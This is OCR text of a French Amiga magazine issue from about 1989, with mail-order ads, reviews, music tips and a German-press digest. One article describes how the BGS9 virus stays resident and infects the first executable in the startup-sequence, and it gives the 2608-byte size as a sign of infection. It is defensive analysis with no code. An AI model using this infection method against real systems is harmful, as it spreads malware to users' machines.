- AMIGA © : Total maximum : 3.690 F.
- AMIGA ©: Total maximum : 6.390 F. Faites l'appoint avec des
disquettes à 8 F pièce.
LOGICIELS AMIGA AMIGA 2000
8. 900 F AMIGA ~(D L Choisissez vos logiciels ou vos accessoires
A RETOURNER A : aMIE VPC 11, BD VOLTAIRE 75011 PARIS A
RETOURNER A : aMIE VPC ' NOM_ ADRESSE _ I VOLTAIRE 75011 PARIS
NOM_ ADRESSE _
- VILLE TÉL .
CODE POSTAL I I i I I CODE POSTAL I I M I I TEL__ MON ORDINATEUR AMIGA_ ET MES LOGICIELS OU ACCESSOIRES GRATUITS_ Frais d'envoi. Poste 25 FI Transporteur 80 F. ? CHEQUE ? CCP ? CARTE BLEUE I I I li I I DATE D'EXPIRATION ..I I I I I I I MON ORDINATEUR AMIGA_ ET MES LOGICIELS OU ACCESSOIRES GRATUITS_ frais d'envoi. Poste 25 FI Transporteur 80 F. ? CHEQUE ? CCP ? CARTE BLEUE I I I M i I DATE D'EXPIRATION I I I I I I I I I I I I I I I I I ? CARTE CLUB aMIE ? CARTE CLUB aMIE DATE_ DATE .
SIGNATURE X' SIGNATURE ¦X î
• Livraison : 5 jours maximum, à dater de votre commande. •
Garantie 2 ans. * Escompte 2 % pour règlement comptant. •
Crédit 4 mensualités sans intérêt, après acceptation du
dossier.
AMIE INFORMATIQUE 11, bd Voltaire - 75011 PARIS - Tél. : (1) 43.57.48.20 BGS9 : ’Ce virus est mortel pour disque dur’ par Xavier Leclercq Le Virus BGS9 débarque sur l'Amiga. Attention danger!!
Ce virus est de la même trempe que 1’ IRQ TEAM Virus .c'est un virus qui s'attaque directement aux fichiers éxécutablcs.Ce type de virus porte le nom de "virus coquille".De la même manière que ses confrères qui sont rendus actif par le "Boot" d’une disquette, le BGS9 est résident en mémoire, un reset (classique) est impuissant et ne peut l'éliminer de cette dernière.
En effet le virus se crée une entrée dans la table des programmess résidents (550(exbase)) et peut également se trouver en mémoire en "cohabitant" avec un confrère virus ou virus protector!
Après avoir effectué 4 resets(*) consécutifs un message apparaît.
«') t-e resel devant se faire après l’éxécution du premier fichier de la "startup-sequence" pour que te compteur du virus oit incrémenter de I) Le message est le suivant: A COMPUTER VIRUS IS A DISEASE TERRORISM ISA TRANSGRESSION SOFTWARE P RACY ISA CRIME THISIS THE CURE " B.G.S.9 BUNDERSGRENZSCHUTZ SEKTION 9 SONDERKOMMANDO ’EDW En fait l’étude du code de ce virus permet de dire qu'il s'agit tout simplement de données graphiques qui sont décodées lors de l'affichage. Ce texte n'apparaît donc pas "en clair" (même décodé) car de toutes manières ce ne sont pas des caractères ASCII mais une image.
Comme je l’ai déjà expliqué il s’agit d’un virus s’attaquant aux exécutables. Une fois en mémoire et lorsque vous aurez inséré une nouvelle disquette et effectué un reset le virus lira la "startup-sequence" pour l’analyser. Il trouvera alors le nom du PREMIER fichier s’exécutant et le recopiera dans le dircctory ":devs" s'il existe. Et si ce dernier n’existe pas il recopiera le fichier dans la "root" principale (dfO:). Je dois faire à ce sujet plusieurs remarques.
Premièrement Un fichier protégé sera recopié avec ses protections :inutile donc de le protéger.Deuxième ment le nom du fichier recopié sera modifié en Sa0a0a0202020a0202020a0 ic'est un nom qui n'apparaît pas lors d’un "dir" ou "list" classique. Troisièmement le fichier est recopié par défaut dans le ":devs" car c'est un "sub-directOTy" automatiquement pris dans le chemin (path) du système : le virus accède donc au fichier quel que soit le chemin où le système se trouve lors de l’appel.
Après donc avoir recopié le PREMIER éxécutable il se recopiera à la place du fichier qu’il a préalablement recopié (ouf!!). Il écrasera donc le fichier en y mettant son propre code. La taille de ce fichier qui contient donc le code du BGS9 virus est de 2608 octets et est donc facilement repérable en comparant la taille de la commande initiale provenant d’une disquette (back-up) saine. (Il serait tout de même stupéfiant d’avoir une commande dont la longueur soit justement 2608 octets, mais on ne sait jamais !).
Résumons. La commande "setmap f' par exemple se trouve en début de votre "startup-sequence". Le virus va chercher le nom "setmap" la trouver sur la disquette dans le sous directory ":c" et la recopier dans le sous directory ":devs" en changeant son nom (Sa0a0a0202020a0202020a0). Puis il créera un nouveau fichier Suite page 33 LA PORTEE suite de la page 14 LCD des synthés, alors que la partie Libraire s'occupe de regrouper les différents paramètres et de les sauvegarder sur disquette. Ces programmes, très peu répandus, ne sont cependant plus réservés aux incontournables D50 et autres DX7...
Voici donc une liste non exhaustive des différents Editeurs Libraires qui sont disponibles à ma connaissance sur Amiga, la plupart étant produits par Dr. T’s: CZ Rider (Casio CZ-101 1000, CZ-1, CZ-3000 5000) VZ-1 Editor (Casio VZ-1) DX Heaven (Yamaha DX-7, TX-7) Four-Op Deluxe (Yamaha TX-81Z, FB01, DX 100 27 21) DX7II TX802 Editor (Yamaha DX7II TX802) ESQ-apade (Ensoniq ESQ-l M, SQ-80) D50 Editor (Roland D50) D110 10 20 Editor (Roland D110.D10.D20) MT32 Editor (Roland MT32) PCM-70 Editor (Lexicon) Ml Editor (Korg Ml) M-6 Tricks (Oberheim Matrix 6 1000) Kl Editor (Kawai Kl) K5 Editor (Kawai
K5) Vous pourrez les trouver dans des magasins de musique spécialisés.
Passeport pour la musique La société Californian Passport, dont le fer de lance est le séquenceur Master Tracks Pro, élargit sa gamme Amiga autour de ce produit. A son catalogue figurent désormais: Master Tracks Pro (séquenceur 64 pistes très complet), Master Tracks Jr. (la version Junior du précédent), le Performance Pac (Master Tracks Pro + interface Midi Transport), le Home Studio System (Master Tracks Jr. + interface Midi Transport) et bien sûr l'interface Midi Transport. Passport, 625 Miramontes Street, Half Moon Boy, California USA 94019 (415) 726-0280 Mini-tip mais il fait____ ... de
l’effet. Nombreux sont ceux d’entre vous qui utilisent Sound Fx pour créer leurs musiques sur Amiga. Ce logiciel permet d'affecter à chaque note un effet particulier.
Tout d’abord rappelons que nous ne sommes pas limités à 5 effets par song comme je l’ai souvent entendu dire (sur DEEP par exemple): la fenêtre effets, accessible par le menu EDIT, le raccourci clavier amiga- droite E, la touche Help, ou bien encore en cliquant sur la case Effect de l’écran principal (ils ont fait fort là...) nous permet de redéfinir un des 5 effets en cours sans pour autant altérer les notes éditées alors qu’il avait une autre valeur.
Ceci étant dit, la notation des effets n’en reste pas moins ésotérique et pour ceux qui ne se sentiraient pas l’âme d'un Champollion, voici leur signification: chaque effet est codé sous la forme d’un nombre de 3 chiffres hexadécimal», la valeur du premier chiffre décidant de la nature de l’effet alors que les chiffres suivants apportent si nécessaire des indications supplémentaires.
Oinutilisé 1 XYArpegiato 2 X Ypitchbcnd 3 - -Led Off 4 - -Led On 5 & ôinutilisés 7 X Yglissendo vers le bas 8 X Yglissendo vers le haut 9 à Finutilisés Par exemple, pour faire un glissendo très rapide de C3 à G3, on met 8, l'amplitude du glissendo en demi-tons en X et la vitesse en Y (l=lent, F=rapide) ce qui nous donne 87F.
Autre exemple: pour enlever le filtre passe- bas (Led Off) il suffit que l'effet commence par 3: 318 et 3f2 donneront le même résultat.
Et on ferme le volet jusqu’au mois prochain... Nicolas AMIGA 2000 + MONIT. COUL. 1084
* 10 990 F AMIGA 500 + MONIT. COUL. 1084
* 6 390 F AMIGA 500
* 3 690 F AMIGA 2000
* 8 900 F Promos non cumulables dans la limite des stocks
disponibles. Pour plus d'Inlormations, cerclez 218 et service
lecteur télématique.
- 12225 1 AMIGA 500 + EXTENS. 512 K
* 4 290 F Lecteur interne 3‘ 1 2 1400 F Carte Ricker Fixer 5 500
F Hard card 30 Mo Auloboot 5 990 F 4223S1 AMIGA 500 + 50 DISQ.
3" 1 2
* 3 690 F CITIZEN 120 D SWIFT 24 STAR LC 10 LC 10 Couleur LC
24-10 2 690 F 3990 F 1590 F 4 790 F 1990 F 2490 F 3490 F
.Hli'il'l 900 F | 1 700 F LECTEURS 3' 1 2 externe 5' 1 4
externe EXTENSION MÉMOIRE 512 K sans hortoge 512 K avec horloge
SON INTERFACE MIDI ECE SAMPIER PERFECT SOUND TELEMATIQUE
EMULATEUR ARCHOS EMULATEUR DIGA MODEM DTL 4 990 F| 1890 F 4650
F 18500 F 4 990 F 3990 F BOÎTE DE RANGEMENT Pour 40 disquettes
70 F Pour 90 disquettes 90 F lUL'iUl 990 F | 1290 F f 580 F 950
F 790 F 990 F 6400 F 7 990 F 3350 F 950 F C 64 1541 C 64 + 1541
rr ATARI
43. 57.96.89 AMIGA
43. 57.96.18
43. 38.18.09
43. 57.82.05 OCCASION
43. 57.82.05
(16) 91.42.50.42 MARSEILLE PC
(16) 91.47.74.11 SIGNATURE ï - Les'avan*leS prom°Hons I “ Les
mpîu BS d'un club | Les meilleurs prix sssïïssü; Par Minitel
: 3615 Amie ’ °u écrire à ; Amie VPC V°,taire - 750,, Ptlr,e
La micro sans soucis OPERATION REPRISE AMIGA 500 POUR
L’ACHAT D'UN AMIGA 2000 DISQUE DUR A 590 20 Mo GRAPHIQUE
VIDEO OIGIVIEW GENLOCK GST 30XP GENLOCK MAGNI SCANNER PRINT
TECHNICK HANDY SCANNER Type 4 Tahlelle graphique CRP A4
Tahlelle graphique CRP A3 CAMERA HV 720 OBJECTIF SCHNEIDER
AMIGA 500 + MONIT. COUL. 1084 + EXTENS. 512 K
* 6 790 F AMIGA 500 + MONIT. 1084 + 100 DISQ. 3" 1 2
* 6 390 F PERIPHERIQUES 422253 INCROYABLE!
- 5?4°âô SUR NOS IMPRIMANTES MATRICIELLES POUR TOUT ACHAT DE
PLUS DE 6000 F
* 9 Aiguilles ** 24 Aiguilles
• GARANTIE 1 an constructeur | 1 an Garantie AMIE
• ESCOMPTE 2 % pour paiement comptant
• CRÉDIT 4 mensualités sans intérêt*
• REPRISE Votre vieil ordinateur repris à 50 % de sa valeur**
• REMISES aux collectivités et comités d'entreprise.
¦ Après acceptation du dossier
• * Pour tout achat d'une unité centrale de plus de 5000 F «3615
aMIE VOUS ACHETEZ POUR 1000 F Vous en emportez pour 1100 F LES
lus v’aMiE COMMANDEZ
43. 57.48.20
11. Bd Voltaire 75011 Paris me 75011 Paris 19, bd Voltaire 75011
Paiis 2, rue Rampon 75011 Paris
2. Rue Rampon 75011 Paris 69, cours Lieutaud 13006 69, cours
Lieulaud 13006 (Tcci ki cm sonï TTC. Les pmmollons us son! Pas
cumdanlM) DESIGNATION QUANT PRIX MONTANT • FRAIS D’ENVOi*
P0S1E 75 F TRAIISPORIEUR 80 F T0HL ? CHEQUE OCCP ? CARTE BLEUE
? CARTE CLUB AMIE I I I I I DATE O EXPIRATION I I I I I 1. I I
I I I I 11 -1 L EPSON LX 400 LO 400 MANNESMAN TALLY MT 81 1750
F COMMODORE MPS 1230 MPS 1500 couleur DISQUETTES 3’1 2 DF-DD
Garantie 100 % Par 100 6,50 F l'unité Par 50 7,00 F l'unité
Par 10 7,50 F l’unité MES 10% DE PRODUITS EN PLUS_ IMPRIMANTES
I ORDINATEUR .
1550 F 2290 F DATE_ COMMODORE 64 Extension 2 Mo 6 790 F Emulateur XT 5 490 F Emulateur AT 11000 F Carie accélératrice 14 800 F VILLE_ CODE POSTAL I I I TEL_ PERIPHERIQUES 990 F 1200 F 1990 F X ADRESSE _ A RETOURNER A : AMIE VPC 11, BU VOLTAIRE 750111 •c V TRUCS ET ASTUCES chez Micro Application: Le premier volume de ce nom avait 366 pages et coûtait 199 F. La version actualisée compte 245 pages, et coûte 129 F sans la disquette, et 229F avec celle-ci. Pour moi, aucune hésitation, il faut prendre la version avec disquette, mon expérience de frappe des programmes en BASIC de la première
version trouvée à la FNAC, sans disquette, m’a laissé des souvenirs pénibles. Ceci est d’autant plus vrai pour la nouvelle version qu'elle comporte entre autres une série d'exemples et de programmes utilitaires consistant en trois lignes de code et une demi-page de DATA; l'intérêt pédagogique de retaper le listing est dans ces cas intrinsèquement nul.
Le nouveau volume qui nous est présenté n'a pas grand'chose à voir avec le premier qui reproduisait surtout, avec des explications parfois très schématiques, des programmes écrits par Tobias Becker.. Ces programes avaient toutefois le mérite de donner une ouverture sur l’utilisation des fonctions des bibliothèques de l’Amiga, au lecteur qui voulait bien s'accrocher, quitte à taper de temps en temps des choses qu'il ne comprenait pas. L’organisation de l’ouvrage n'était pas un modèle de clarté, et je n’ai jamais pu me faire à la sémantique de l’index en fin de volume.
Néanmoins, c’est le genre d’ouvrage qui, en l’absence d'autre chose, m’a permis d'avancer dans la compréhension de 1*Amiga, tout en n'étant capable de programmer qu’en Basic, et je ne regrette pas cet achat.
Le nouvel ouvrage que nous propose Micro Applications est tout différent ; un coup d’oeil sur la table des matières nous montre qu’il y a de tout, et qu’on peut s’attendre à y trouver des choses qu’on ne trouvera pas dans d'autres ouvrages plus structurés mais moins pragmatiques.
On commence par un chapitre comportant une série d’astuces que l'on ne trouve en général qu’au hasard de la lecture des revues; ensuite un chapitre permettant d’étendre d’une manière intéressante les possibilités de l’AmigaBasic, dans des domaines où ce dernier est peu performant, comme la personnalisation des fenêtres, l’utilisations des demandes (requesters), la gestion des fichiers et l’accès à l’AmigaDos.
Il y a encore un chapitre sur le langage machine, un peu léger, un chapitre sur le matériel et les nouveaux processeurs, un chapitre sur le Workbench 1.3, un chapitre intéressant sur la gestion des imprimantes, et deux chapitres encore sur le Workbench et les moyens de le personnaliser, ainsi que diverses tables.
En bref, un ouvrage qui contient une foule d’informations; feuilletez-le avant de l’acheter, l’intérêt de ce livre pour vous dépend énormément de votre niveau de connaissance de la machine, et de vos centres d’intérêt personnels. Ceci dit, je crois qu’il a sa place, à un moment donné de son évolution, dans la bibliothèque de l'AMIGAïde.
COMPRENDRE et bien exploiter son AMIGA chez Titus Cet ouvrage canadien a déjà été mentionné dans ' la rubrique "CU pour Débutants". Depuis, ses auteurs l’ont revu et amélioré, et il vient avec deux disquettes constituant une superbe collection d’utilitaires classiques du Domaine Public.
Ce livre est vraiment, à mon avis, LE livre à acheter par tout acquéreur d'un Amiga, qui veut dépasser le stade de l’utilisation pure et simple d'un certain nombre de jeux, ou de programmes utilisés tels quels (programmes de dessin, de traitement de texte, etc). La première version n'ayant pas été diffusée en France, inutile de s'y référer; disons simplement qu’elle a reçu de très nombreuses additions, qui lui ajoutent une soixantaine de pages. Le nombre de pages peut être estimé à 300, le type de pagination utilisé ne permettant pas de le connaître directement.
L’intérêt de ce livre, par rapport à la documentation - très bien faite au demeurant
- livrée avec l’Amiga, est d’aller au-delà de la description
technique des fonctionnalités et des commandes, complète au
sens strict, mais forcément très elliptique, en prenant - sans
exagération toutefois - le lecteur par la main, en lui faisant
faire des exercices et en signalant un bon nombre de pièges ou
de particularités, qu’on ne découvre habituellement que par
un pénible processus d'apprentissage par erreurs successives.
Le livre fait occasionnellement référence à des programmes du domaine public, ce qui est précieux car il y a dans l'AMIGA un tas de choses qu’on ne peut faire qu'avec des programmes du domaine public, à moins d’être programmeur en C ou en assembleur et d’y passer du temps.
D. y a une importante section sur les commandes de l’AmigaDos,
avec une page par commande pour simplifier la consultation,
mais rassurez-vous, il n'y a pas vraiment beaucoup de blanc !
Les chapitres sur la video et le son sont réduits à leur plus simple expression, mais il est vrai qu’ils justifieraient à eux seuls l’existence d'ouvrages complets. Je me permettrais toutefois de suggérer aux auteurs de les étoffer un peu dans une version ultérieure.
Enfin, je ne peux pas résister à l'envie de vous donner la liste des utilitaires fournis sur les DEUX disquettes qui accompagnent le volume (les disquettes sont dans une pochette scellée faisant partie de la reliure): Disquette OUTILStfl: ARC D-MOUSE HANDYICONS DIS- KCATDU-VINEWZAP DISKSALV FILEMAP PTROFF DISKX FONTAS- SIGNSCREENX D1SQUE-VD0 FUNC- KEYSELECT SETPREFS SUPERVIEW SHORTCUT TASKCONTROL SHOW VIRUSX SHOWFONT WARP SHOWIZ ZOO Disquette 0UTILS 2 ARP 1.3 DFC ICONMEISTER BRUS- HICON DISKOPTIKEYMAPED CALC DISKVIEW NOVIRUS CLIP1T ICONIZE POWERPACKER CONMAN ICONLAB SETICONTYPE SNIPIT Il faut
toutefois signaler que les documentations sur les disquettes sont en anglais (1) ; également que certains de ces utilitaires ne fonctionnent pas - ou mal - avec nos claviers français. Enfin, les auteurs rappellent que l’utilisation régulière d’un programme " Shareware " comporte l’obligation morale de verser une contribution à son auteur.
Ceci dit, il s’agit probablement ici d’une des plus impressionnantes compilations d'utilitaires en deux disquettes.
En bref, je recommande cet ouvrage sans aucune hésitation ; si votre revendeur ne l’a pas, demandez-lui de s’adresser chez Titus pour vous le procurer. J’irais même jusqu’à dire que c’est un ouvrage que tout revendeur devrait proposer systématiquement à tout acheteur d’Amiga.
(1) Si la traduction de la documentation d'un utilitaire vous est
indispensable, voyez s'il figure sur ’ une des disaqeltes
Prestige produites par Hermes Diffusion, toutes les docs sont
en Français et les traductions sont de bonne qualité.
(Ed: Ce livre est dorénavant disponible "en direct" de chez Titus au prix de 249F port compris. (Titus, 28 Ter Avenue de Versailles, 93220 Gagny, tél (1) 43-32-10-92)) Je me suis dis : pourquoi ne pas parler des magazines allemands? Ils sont si bien fait et il y a tellement de choses intéressantes... Je vous propose donc de feuilleter avec moi, page après page les différentes publications comme si vous les aviez sous la main.
Une de mes revues allemandes i IUn préférées se nomme KICK START".
Elle n'a rien à voir avec DATA BECKER ni Markt&Technik. Quand je songe que MICRO APPLICATION se contente de traduire les livres de DATA BECKER! Ne vous étonnez plus de la production abondante de cet éditeur français! (il fait la même chose sur ST, PC... il est vrai que la traduction revient bien moins cher que de publier des auteurs français!). Je disais donc, après cette remarque caustique, que l'éditorialiste se posait la question: L'Amiga a-t-il deux visages? Personne ne dirait d’un Cray que c’est un ordinateur familial et d'un C64 que c'est une Station.
De là, la crise d'identité des Amigaïsies.
On n'arrêtera jamais de se poser cette question.
Nouveautés-Actualités(version Kick- Start): Soft-Logik a produit quatre disks de fonts pour PageStream. Le prix... limiiun dans les 350 Frs par disk! On trouve aussi la platine pour une liaison AMIGA-C64 par la RS-232.
Et une carte de transputer MEGA- Link02 D3. (résolution 1280x1024 en 256 parmi 16,7 millions de couleurs).
Une carte Apple Talk-Amiga avec 2 ports série, 1 pon parallèle, une option pour un SCSI avec ROM autoboot (le device est fourni avec...). Un nouvel AMIGA tout en noir (bonjour NEXT) dans un tower dont le plus intéressant sur la carte (qui se met dans le slot CPU du 2000) est le 68030 a 36 Mhz. L'intérêt du 68030 par rapport au 68020 c'est qu'il peut être cadencé en asynchrone et que le Memory Management Unit 68851 (MMU) est intégré dans le processeur donc pas de problèmes pour UNIX (mon système préféré depuis toujours). Donc vous pouvez choisir la cadence entre 25-33-36-40 (Ed: c'est une
carte GVP bricolé, voir reportage sur Amiga’89).
Le prix... hmm! On peut trouver une Renault 5 plus cher encore! Si je vous dis que le boiticr en tower vaut déjà 4000 Fr... vous voilà devenu blême mais n'oubliez pas, c'est un système peu cher en comparaison de ce qui existe sur le marché.
Le compilateur pour GFA basic a mis plus de temps que pour l'ATARI mais il vient! Voici le résultat d’un test d’une Béta-Version. La dernière version du GFA a le numéro 3.041. Bon parlons dé l'interpréteur : moins de GURUs, cette version est acceptable et elle tourne aussi vite (presque) que sur l’ATARI. Même des programmes de ce dernier sont transportables.
Les tri Quick et Shell fonctionnent sans problème et à bonne vitesse. L'éditeur reste confortable avec surtout une remarquable vitesse de scroll... Bref, venons en au compilateur. 11 est séparé en deux avec CodeObjet et linker. E est utilisable facilement avec le shell inclu sur le disk. Avec la touche de fonction F10 vous appelez le compilateur et le linker. Un petit plus, le code source du shell est livré avec, écrit en GFA-BASIC. Après l'appui sur les touche CTRL-T un programme compilé peut être testé et l’interpréteur peut être appelé avec CTRL-I. Comme le code objet et le linker sont
séparés cela permet d’inclure des modules sans être obligé de recompiler tout le programme et aussi des procédures et programmes d'autres langages... Dommage que le code- objet n’a pas un format standard ce qui oblige à utiliser un programme de conversion. Attention programmeurs, le compilateur n'a que très peu de messages d'erreurs.
Le Workbench en eprom? C'est possible avec une carte sur le port d’extension Autoboot. Autoconftgurée. Jusqu'a 8 partitions, adressage variable, rams statiques prix de la carte 500 : 900 Fr.
Workbench 1.3 eproms : 2000 Fr.
Prix de la carte 2000 :1400 Fr.
Workbench : 2600 Fr.
Pour un 1000 on peu ajouter un kickstart.
C’est ainsi que je termine ma lecture de mon magazine préféré. J’espère que vous avez pris plaisir a lire ce condensé et que si vous voulez plus de renseignements sur certains articles... ben demandez moi... si je peux... Ma lecture suivante c'est AMIGA de Markt&Technik. C’est les organis ateurs avec Commodore Allemagne de l'expo AMIXPO la super foire de Cologne du 10 au 12 novembre. En premier lieu on apprend les nouveautés qui seront présentées. Je vous en donne en vrac: carte 68030 a 40 Mhz, Transputer, lecteur CD avec 600 Mbytes, disk. Dur avec 2 Mbytes s... Enfin... plein. De choses
intéressantes pour tous les amigaïs- tes que nous sommes.
Pour le plaisir je vous signale une série limité de l’Amiga avec un look spécial d’"Art Moderne"; un programme de caisse pour coiffeur; un test de X-CAD Désigner (négatif ; sortie correcte qu'avec unploiter) et X-CAD Professional (négatif : le bouquin, pas de 24 aiguilles, pas précis avec la souris). Le prix des X respectivement dans les 1400 Fret 5300 Fr.
A-News 19 N'avez-vous jamais rêvé de mettre votre plus beau dessin sur un T-shirt ? C'est possible avec votre imprimante en utilisant un ruban spécial. Vous prenez votre T-shirt et vous le mettez dans votre imprimante... Stop! Vous n’imprimez pas directement sur le tissu mais sur du papier normaL Après 15 hard copies le ruban d'une NEC P6 est usé. Toutes les couleurs sont possibles même l'or et l'argent! Prix entre 100 et 210 Fr. Space Ace quant a lui (hehe! Oui le soft qui est une presque suite de dragon’s laij) vaut 420 Fr.
CRS A LU POUR VOUS LES MAGAZINES ALLEMANDS DE NOVEMBRE Puis j'ai lu l'AMIGA SPECIAL avec les réactions des lecteurs après l'interview des programmeurs du Lamer Exterminator. Si l'article vous intéresse, dites le moi. Dans ce numéro on annonce une souris Genius (ceux qui font du PC connaissent) pour AMIGA au prix de 280 Fr. Quelques secrets du nouveau Workbench 1.4, une carte Ethernet (prix d’une carte réseau 4000 Fr environ). Gold Disk met un nouveau produit sur le marché: Transcript.
E pourrait tenir la route (qui parle encore de UBM Text ou de Go Amiga!).
La page 25 offre une liste d’utilitaires vraiment utiles. En premier nous avons W- SIIELL, meilleure interface pour AREXX et CLI; Diskmaster, un éditeur de disks; Cygnus- Ed un éditeur de texte; PowerWindows qui source et facilite la programmation des écrans, fenêtres et gadgets; Discovery, un moniteur de disks; et Turbo Print II qui accélère l’impression.
Ùn programme que beaucoup d'Ataristes apprécient, Zoetrope a été transposé sur Amiga (explications suivi d'un test). En résumé, pas mieux en graphique que la référence Deluxe Paint III. Mais peut-être en animation; sûrement mieux que Fantavision.
Le prix: environ 700 Fr. Dans le coin Domaine Public, 5 pages pour donner le contenu des Fish 237 à 250.
Pour les programmeurs, une explication complète du Copper. A-Max sans roms grâce au listing pour Manx ou MCC ou Seka (après modification des labels) Avant d’oublier de vous en parler, je vous signale qu'une autre revue ( C'T de novembre
1989) publie un Link-interface pour 2000.
Pour ceux qui ignorent comme moi toutes ces subtilités je vous explique: pour utiliser une platine de Transputer il faut l'interface. C'est donc les plans et les programmes de cette interface qui se trouvent dans cet article.
J'ai pris beaucoup de plaisir a lire ces revues... moins à les résumer mais, que ne ferais-je pas pour les malades de l'AMIGA!
Moi ça me coûte 250 francs par mois et pour vous c'est un complément d'A-News (je sais, je sais, moi j'ai les images en plus). Le plus grave (pour ma femme) un nouveau journal est sorti en Allemagne l'AMIGA JOKER (encore 22.75 fr).
Sur ces bonnes paroles, je vous abandonne et vous dis au prochain résumé (si dieu le veut...hehe). La disquette Hermès Prestige N’I porte bien son nom. Elle ne comporte "que" cinq programmes, mais tous d'excellente qualité.
DOMPUB en FRANÇAIS !
Du moins pour les docs !
Testé pour vous par Pierre Ardichvili Hermès Diffusion distribue des disquettes du Domaine Public, mais il créent aussi leurs disquettes propres; j'ai eu en main les disquettes Prestige N°1 et 2, voici quelques impressions.
D abord une précision: ceci sont mes impressions personnelles. J'essaie, comme l AUTO-JOURNAL, d'être indépendant et objectif. Indépendant, c'est assez facile, objectif, ce l'est moins. Quoi qu'il en soit, je ne me priverai pas de faire des compliments et des critiques. Les critiques de l'Auto-Journal ne m'ont jamais çmpêché d’acheter la voiture dont j’avais envie, mais au moins elles me prévenaient de ses qualités et de ses défauts, donc pas de surprise et donc pas de déception. Par ailleurs, il n’est pas possible de tout essayer, cela donnerait des articles beaucoup trop longs.
A-News La présentation de la disquette est classique, on peut accéder aux programmes et aux documentations par le Workbcnch ou par le CLI. Si vous démarrez le système par la disqueue, vous avez droit à’ un grand logo accompagné d'une musique. Très bien, leur présence vous rassure sur l’absence de virus dans le boot-block.
Les documentations sont en Français, très bien traduites (incidemment, icône est du féminin !!!, il n'y a que dans des textes relatifs à l’Amiga que j'aie pu voir ce mot employé au masculin).
On trouve sur cette disquette: 1 La dernière version de PowerPacker.
Un programme de compactage-décompactage connu, mais peut-ctrc bien le meilleur du genre, du moins à ce qu'on peut déduire de la lecture de la doc. J'ai bien aimé la possibilité de compacter ou décompacter une série de programmes par l'intermédiaire d’un script, et de pouvoir limiter le scintillement des couleurs au décompactage au pointeur seul, ou encore mieux, de ne faire scintiller que la LED rouge de l’alimentation, ce qui vous renseigne sur ce qui se passe quand le travail s'effectue en arrière-plan en multitâche.
2 MathPaint, un bon programme de tracé de fonctions mathématiques. Le seul truc bizarre est la notation scientifique imposée pour la graduation des axes ; c’est encombrant et peu lisible. On aimerait avoir d’autres choix. Le traducteur de la doc n’a pas essayé le programme à fond, car il nous dit en français qu’il y a une fonction de chargement de matrices, sans plus. Que fait-elle, mystère, d'autant plus que le fichier "example.mat" proposé par le requester correspondant manque sur la disquette.
3 SlideShow-Cstr. Un programme de présentation d'images en séquence, avec pas mal de possibilités, mais il faudrait un essai complet pour le positionner dans la multitude des programmes de ce genre disponibles dans le DP. L'idée est de permettre la réalisation de Slide-Shows sans avoir à écrire de script. 11 y a 7 effets de transition, et trois images pour jouer avec.
?a 4 Iconluibl.O, un programme convivial pour exécuter ce que j'appellerais les opérations 'administratives" sur les icônes (principalement de les visualiser et d'en changer les paramètres sans être obligé d'ouvrir éventuellement la cascade de fenêtres menant à l'icône à traiter). Ce n'est pas un programme qui a pour mission la création graphique de l'icône, il ne comporte donc ni outils de dessin, ni de fonctions de création d’icônes à partir d'images existantes. On peut trouver sur T-Bag 23 la version 1.1 qui permet en plus la transformation en icônes de brosses Dpaint ou autres. Je me
permets de suggérer à Hermès Diffusion de mettre cette version plus récente sur leur disquette, si ce n’est déjà fait.
5 KeyMapEd, à mon avis la perle de la disquette. Voilà enfin l'éditeur de clavier complet, convivial, rapide et utilisable sans restriction avec les claviers non américains.
A la poubelle donc SclKcys, Keybird et tutti quanti, ils ont rendu de bons services, mais place aux jeunes, et bienvenue à KeyMapEd.
En résumé, une très bonne disquette; avec des produits de cette qualité. Hennés Diffusion dîvrait avoir du succès. Voyons la suite... La disquette Prestige n°2 contient trois animations, dont le fameux Jongleur et Kahnankas. On doit les avoir vues au moins une fois dans sa vie! La troisième représente un vol d'oiseaux autour d'un texte "AMIGA" en 3D.
Dans la série des disquettes diffusées par Hermès, j'ai eu également en mains la disquette MiA 2. Toujours la même présentation très conviviale; je ne vais pas, faute de place, détailler la description des 11 programmes qui s'y trouvent, et dont voici les noms: Accordion (réussite): Ballyll (jeu d'adresse, très prenant); Bites (place libre sur les unités de disques): Dazzle (sorte de kaléidoscope): Dis- kview (visualise la localisation des fichiers sur une disquette): Divzero (annule le GURU 5); Dump (visualisation de fichiers: semblable à type opt H); Sub (messages subliminaux); Kill
Requester (sans commentaire); Mousetrap (Labyrinthe); Popwin (manipulation sur les fenêtres); PPMore (lit les fichiers texte compactés par PowerPacker); Qed (version plus récents que sur MA 1 ; détails); Tetrix Metailica (super Tetrix); Trackmon (renseignements sur les lecteurs de disquettes) Ouelques fleurs et quelques cactus tout de même !
DivZero annule l'apparition du GURU n'5 en cas de division par zéro ; cas typique: DBW Ren- der lorsque certaines coordonnées de vecteurs sont nulles. La plupart des programmes s'acco- modent parfaitement de l'approximation de l'infini que calcule la machine. A mettre dans la séquence de démarrage, çà ne peut pas faire de tort.
Tetrix Métairies. J’en ai entendu beaucoup de bien, pour ma part, ayant dans l'oeil et dans les doigts le Tetrix simple, j'ai eu du mal à m'y faire. Une caractéristique qui peut être intéressante lorsqu’on y est habitué: la pièce ne tombe en accéléré que tanl que l'on appuie sur la touche ad hoc. Cela permet certains "repentirs" bienvenus. Pour ceux qui aiment les présenta- tons chamarrées et les bruitages. Tetrix Metailica les changera de l'austérité monacale de Tetrix.
Très belle réalisation.
Dazzle. To dazzle signifie éblouir. C'esl effectivement un vieux classique, mars toujours aussi éblouissant. Si vous résistez à la première minute de cette démo graphique sans avoir mal aux yeux, c'est un régal. Le nombre des variations, la choix des couleurs et des formes en font quelque chose de fascinant. Si ce qui sort sur l'écran ne vous dit rien, n'hésitez pas à arrêter le programme et à le relancer, les séquences sont engendrées de manière aléatoire.
Sub. Un petit divertissement que s'est offert Steve Tibbett. Vous pouvez faire apparaîïe un message, sur une trame, de temps en temps, selon un procédé qui a ôté interdit pour la blidté. Car la communication du message se t à l'insu de la personne qui le reçoit. J'ai essayé ce programme pour mettre dans l’idée de ma femme, qui se sert régulièrement de l'Amiga, de changer de voiture, mars sans succès I En fait, je m’aperçois que je n'ai pas décerné de cactus. Cette disquette Mia M2 est bien dans la ligne de la première, et ce n'est pas dommage.
